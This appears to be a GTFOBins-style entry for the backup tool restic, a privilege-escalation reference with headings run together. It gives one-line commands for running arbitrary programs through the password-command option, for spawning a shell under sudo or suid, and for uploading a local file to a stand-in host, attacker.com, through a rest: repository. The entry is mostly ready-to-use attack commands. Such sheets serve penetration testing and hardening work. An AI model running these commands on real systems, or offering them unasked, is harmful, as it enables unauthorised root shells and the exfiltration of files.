restic
Command Execution
Context: sudo, suid, unprivileged
RESTIC_PASSWORD_COMMAND='/path/to/command' restic backupContext: sudo, suid, unprivileged
restic --password-command='/path/to/command' backupShell
Context: sudo, suid, unprivileged
RESTIC_PASSWORD_COMMAND='/bin/sh -c "/bin/sh 0<&2 1<&2"' restic backupContext: sudo, suid, unprivileged
restic --password-command='/bin/sh -c "/bin/sh 0<&2 1<&2"' backupUpload
Context: sudo, suid, unprivileged
restic backup -r rest:http://attacker.com:12345/x /path/to/input-file